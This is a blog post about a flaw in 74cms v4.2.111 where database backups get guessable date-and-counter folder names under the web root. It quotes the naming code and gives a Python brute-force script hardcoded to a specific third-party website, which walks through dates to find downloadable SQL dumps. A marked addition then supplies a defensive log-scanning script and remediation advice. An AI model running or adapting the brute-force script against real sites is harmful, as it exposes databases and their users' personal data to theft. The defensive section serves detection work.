74cms v4.2.111 backup vulnerability
Author: Iamyc   2019-01-26 14:10 (Saturday)   Heat: 912°

Today I picked up a random copy of the open-source 骑士cms (74cms), version 4.2.111.

This code base is built on top of ThinkPHP, but let's have a look anyway and see whether anything can be dug out of it.

。。。

I'll skip the process in between and go straight to the vulnerability.

First, look at this code in Application\Admin\Controller\DatabaseController.class.php:


    /**
     * Generate the backup folder name
     */
    protected function _make_backup_name(){
        $backup_path = DATABASE_BACKUP_PATH;
        $today = date('Ymd_', time());   // date prefix, e.g. 20190126_
        $today_backup = array(); // sequence numbers already used today
        if (is_dir($backup_path))
        {
            if ($handle = opendir($backup_path))
            {
                while (($file = readdir($handle)) !== false)
                {
                    if ($file{0} != '.' && filetype($backup_path . $file) == 'dir')
                    {
                        if (strpos($file, $today) === 0)
                        {
                            $no = intval(str_replace($today, '', $file)); // today's sequence number
                            if ($no)
                            {
                                $today_backup[] = $no;
                            }
                        }
                    }
                }
            }
        }
        if ($today_backup)
        {
            $today .= max($today_backup) + 1;   // next number after the highest existing one
        } else
        {
            $today .= '1';                      // first backup of the day is always _1
        }
        return $today;
    }

The name is built from $today = date('Ymd_', time()), i.e. a prefix of the form 20190126_.


        if ($today_backup)
        {
            $today .= max($today_backup) + 1;
        } else
        {
            $today .= '1';
        }
        return $today;
The suffix then starts at 1; if that folder already exists, the highest existing number plus 1 is used. So number 1 is guaranteed to exist for any day that has a backup, and brute force can simply start from 1.
The resulting folder name is 20190126_1.


    /**
     * Save the exported SQL
     */
    protected function _sava_sql($vol){
        // <backup dir>/<backup name>/<backup name>_<volume>.sql
        return file_put_contents(DATABASE_BACKUP_PATH . $this->backup_name .
            '/' . $this->backup_name . '_' . $vol . '.sql', $this->dump_sql);
    }
This produces 20190126_1/20190126_1_1.sql.
The full path is data\backup\database\20190126_1\20190126_1_1.sql.
Once that one is found, continue with 20190126_2\20190126_2_1.sql and so on.


With the idea in hand, the rest is simple brute force. The exp is as follows:


import requests

year = ['2015', '2016', '2017', '2018', '2019']
month = ['%02d' % m for m in range(1, 13)]
day = ['%02d' % d for d in range(1, 32)]
url = "http://www.xunpao123.com/51jishiwang/data/backup/"
tezheng = "Copyright © 2016 74cms.com"   # 74cms fingerprint (not used below)
# must be a dict (the original used a comma, which makes a set, not a dict)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}


def main():
    url = "http://www.xunpao123.com/51jishiwang/data/backup/database/"
    for ye in year:
        for mo in month:
            for da in day:
                tim = ye + mo + da
                url_0 = url + tim + "_1/"   # first backup folder of that day
                html = requests.get(url_0, headers=headers)
                # a 200 whose body does not contain "404" means the folder exists
                if html.status_code == 200 and html.text.find("404") < 0:
                    print(url_0 + tim + "_1_1.sql")


if __name__ == '__main__':
    main()
The result (screenshot in the original post):
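As a defensive counterpart, added here and not part of the original post, a small Python check that scans web-server access log lines for the predictable backup paths derived above: it flags clients that probe many `YYYYMMDD_n` folder names and any backup `.sql` file that was actually served with HTTP 200. The log lines, IP addresses and probe threshold are constructed sample values.

```python
import re
from collections import defaultdict

# Combined-log style lines, constructed for this example (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jan/2019:14:01:02 +0800] "GET /data/backup/database/20190124_1/ HTTP/1.1" 404 187 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2019:14:01:03 +0800] "GET /data/backup/database/20190125_1/ HTTP/1.1" 404 187 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2019:14:01:04 +0800] "GET /data/backup/database/20190126_1/ HTTP/1.1" 200 1203 "-" "Mozilla/5.0"
203.0.113.7 - - [26/Jan/2019:14:01:05 +0800] "GET /data/backup/database/20190126_1/20190126_1_1.sql HTTP/1.1" 200 5243910 "-" "Mozilla/5.0"
198.51.100.9 - - [26/Jan/2019:14:02:00 +0800] "GET /index.php?m=Home HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# The names produced by _make_backup_name / _sava_sql:
#   /data/backup/database/<YYYYMMDD>_<n>/            (folder)
#   /data/backup/database/<YYYYMMDD>_<n>/<same>_<vol>.sql  (dump file)
BACKUP_RE = re.compile(r'^/data/backup/database/(\d{8}_\d+)(?:/(\1_\d+\.sql))?/?$')


def analyse(log_text, probe_threshold=3):
    """Return (scanners, exposures): client IPs that probed at least
    probe_threshold backup paths, and (ip, path) pairs where a backup
    .sql file was served with HTTP 200."""
    probes = defaultdict(int)
    exposures = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                       # not a request line we understand
        path = m.group('path').split('?', 1)[0]
        b = BACKUP_RE.match(path)
        if not b:
            continue                       # ordinary traffic
        probes[m.group('ip')] += 1
        if b.group(2) and m.group('status') == '200':
            exposures.append((m.group('ip'), path))
    scanners = sorted(ip for ip, n in probes.items() if n >= probe_threshold)
    return scanners, exposures


if __name__ == '__main__':
    found_scanners, found_exposures = analyse(SAMPLE_LOG)
    print("probing clients:", found_scanners)
    print("served backups:", found_exposures)
```

Any entry in `exposures` means the backup directory is readable through the web server; the remedy is to keep DATABASE_BACKUP_PATH outside the document root or deny it in the web server configuration, and to give backup names an unguessable component rather than a date and a counter.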
Author: Iamyc      Title: 74cms v4.2.111 backup vulnerability
URL: http://lang-v.com/first_cms/yc/emlog/src/?post=60
Copyright: unless otherwise noted, this article is original content of "YC's Blog"; please keep the source when reposting.
